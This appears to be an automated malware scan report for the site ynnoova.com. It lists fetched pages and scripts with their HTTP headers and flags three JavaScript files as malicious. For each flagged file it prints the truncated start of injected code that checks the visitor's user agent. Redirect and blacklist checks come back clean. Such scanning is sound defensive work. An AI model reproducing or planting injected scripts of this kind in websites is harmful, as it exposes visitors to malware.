Scanned pages/files
Request | Server response | Status |
http://ynnoova.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Sun, 14 Jun 2015 07:04:08 GMT Location: http://www.ynnoova.com/ Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 14 Jun 2015 08:04:08 GMT | clean |
http://www.ynnoova.com/ | 200 OK Content-Length: 41593 Content-Type: text/html | clean |
http://www.ynnoova.com/media/system/js/mootools-core.js | 200 OK Content-Length: 98685 Content-Type: application/javascript | clean |
http://ynnoova.com/media/system/js/core.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Sun, 14 Jun 2015 07:04:12 GMT Location: http://www.ynnoova.com/media/system/js/core.js Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 331 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 14 Jun 2015 08:04:12 GMT | clean |
http://www.ynnoova.com/media/system/js/core.js | 200 OK Content-Length: 7107 Content-Type: application/javascript | clean |
http://ynnoova.com/media/system/js/caption.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Sun, 14 Jun 2015 07:04:13 GMT Location: http://www.ynnoova.com/media/system/js/caption.js Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 334 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 14 Jun 2015 08:04:13 GMT | clean |
http://www.ynnoova.com/media/system/js/caption.js | 200 OK Content-Length: 3052 Content-Type: application/javascript | clean |
http://ynnoova.com/plugins/system/jcemediabox/js/jcemediabox.js?version=111 | 200 OK Content-Length: 102123 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob Antivirus reports:
| ||
http://ynnoova.com/plugins/system/modalizer/modals/jquery.min.js | 200 OK Content-Length: 93691 Content-Type: application/javascript | clean |
http://ynnoova.com/plugins/system/modalizer/modals/colorbox/jquery.colorbox-min.js | 200 OK Content-Length: 9593 Content-Type: application/javascript | clean |
http://ynnoova.com/media/system/js/mootools-more.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Sun, 14 Jun 2015 07:04:14 GMT Location: http://www.ynnoova.com/media/system/js/mootools-more.js Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 340 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 14 Jun 2015 08:04:14 GMT | clean |
http://www.ynnoova.com/media/system/js/mootools-more.js | 200 OK Content-Length: 240654 Content-Type: application/javascript | clean |
http://ynnoova.com/cache/js-b3f0603ced230e05b13bbd397bc3d60b.php | 200 OK Content-Length: 49303 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob ; Antivirus reports:
| ||
http://ynnoova.com/modules/mod_roktabs/tmpl/roktabs.js | 200 OK Content-Length: 8825 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob Antivirus reports:
| ||
http://cdn.wibiya.com/Toolbars/dir_1098/Toolbar_1098168/Loader_1098168.js | 400 Bad Request Content-Length: 270 Content-Type: text/html | clean |
http://cdn.wibiya.com/test404page.js | 400 Bad Request Content-Length: 209 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ynnoova.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=3600
Connection: close
Date: Sun, 14 Jun 2015 07:04:08 GMT
Location: http://www.ynnoova.com/
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 14 Jun 2015 08:04:08 GMT
...308 bytes of data.
GET / HTTP/1.1
Host: ynnoova.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=3600
Connection: close
Date: Sun, 14 Jun 2015 07:04:08 GMT
Location: http://www.ynnoova.com/
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 14 Jun 2015 08:04:08 GMT
...308 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ynnoova.com
Referer: http://www.google.com/search?q=ynnoova.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ynnoova.com
Referer: http://www.google.com/search?q=ynnoova.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ynnoova.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ynnoova.com/
Result: ynnoova.com is not infected or malware details are not published yet.
Result: ynnoova.com is not infected or malware details are not published yet.